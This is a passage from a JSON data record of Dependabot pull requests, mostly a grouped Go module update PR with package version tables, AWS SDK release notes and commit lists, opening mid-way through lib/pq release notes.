Old\ntx.Prepare(CopyIn(\u0026quot;temp\u0026quot;, \u0026quot;num\u0026quot;, \u0026quot;text\u0026quot;, \u0026quot;blob\u0026quot;, \u0026quot;nothing\u0026quot;))\n\u003cp\u003e// Replacement\ntx.Prepare(\u003ccode\u003ecopy temp (num, text, blob, nothing) from stdin\u003c/code\u003e)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport protocol 3.2, and the \u003ccode\u003emin_protocol_version\u003c/code\u003e and\n\u003ccode\u003emax_protocol_version\u003c/code\u003e DSN parameters (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1258\"\u003e#1258\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslmode=prefer\u003c/code\u003e and \u003ccode\u003esslmode=allow\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1270\"\u003e#1270\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003essl_min_protocol_version\u003c/code\u003e and \u003ccode\u003essl_max_protocol_version\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1277\"\u003e#1277\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/1f3e3d92865dd313b4e146968684d7e3836c76e8\"\u003e\u003ccode\u003e1f3e3d9\u003c/code\u003e\u003c/a\u003e Send datestyle as a startup parameter (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/32ba56b8f9c09...\n\n_Description has been truncated_","html_url":"https://github.com/TheThingsNetwork/lorawan-stack/pull/7880","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheThingsNetwork%2Florawan-stack/issues/7880","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7880/packages"}},{"old_version":"1.50.36","new_version":"1.55.8","update_type":"minor","path":null,"pr_created_at":"2026-04-06T18:54:49.000Z","version_change":"1.50.36 → 1.55.8","issue":{"uuid":"4213491276","node_id":"PR_kwDOFyRkIM7QSch6","number":10730,"state":"open","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 41 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-06T18:54:49.000Z","updated_at":"2026-04-06T19:01:39.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":41,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.5","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.14","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.296.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.56.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.3.1+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.17.2","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.1","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.39.1","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.53.0","repository_url":"https://github.com/vmware/govmomi"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.1"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.20.1","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.7","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.2.2","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.5` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.14` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.296.2` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.56.2` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.3.1+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.17.2` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.1` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.39.1` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.53.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.1` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.1` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.7` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.2.2` | `5.3.1` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 10 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.5` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.14` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.39.1` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.50.4` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 1.41.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90650dd22735ab68f6089ae5c39b6614286ae9ec\"\u003e\u003ccode\u003e90650dd\u003c/code\u003e\u003c/a\u003e Release 2026-03-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dd88818bee7d632a8b9da6e2c78ef92e23c94c62\"\u003e\u003ccode\u003edd88818\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b662c50138bd393927871b46e84ee3483377f5be\"\u003e\u003ccode\u003eb662c50\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/500a9cb3522a0e71d798d7079ff5856b23c2cac1\"\u003e\u003ccode\u003e500a9cb\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6221102f763bd65d7e403fa62c3a1e3d39e24dc6\"\u003e\u003ccode\u003e6221102\u003c/code\u003e\u003c/a\u003e fix stale skew and delayed skew healing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3359\"\u003e#3359\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0a39373433a121800bc68efa743a7486eb07aa3f\"\u003e\u003ccode\u003e0a39373\u003c/code\u003e\u003c/a\u003e fix order of generated event header handlers (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3361\"\u003e#3361\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/098f3898271e2eaaf8a92e38d1d928fb018805a6\"\u003e\u003ccode\u003e098f389\u003c/code\u003e\u003c/a\u003e Only generate resolveAccountID when it's required (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3360\"\u003e#3360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6ebab66428e97db0ee252fea042d56b1313cb9f6\"\u003e\u003ccode\u003e6ebab66\u003c/code\u003e\u003c/a\u003e Release 2026-03-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b2ec3beebb986a5e74e50d0c105119d84e1e934e\"\u003e\u003ccode\u003eb2ec3be\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abc126f6b35bfe2f77e2505f6d04f8ceced971ee\"\u003e\u003ccode\u003eabc126f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.21\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-04-10)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/connect/CHANGELOG.md#v1510-2023-04-10\"\u003ev1.51.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds the ability to configure an agent's routing profile to receive contacts from multiple channels at the same time via extending the UpdateRoutingProfileConcurrency, CreateRoutingProfile and DescribeRoutingProfile APIs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca 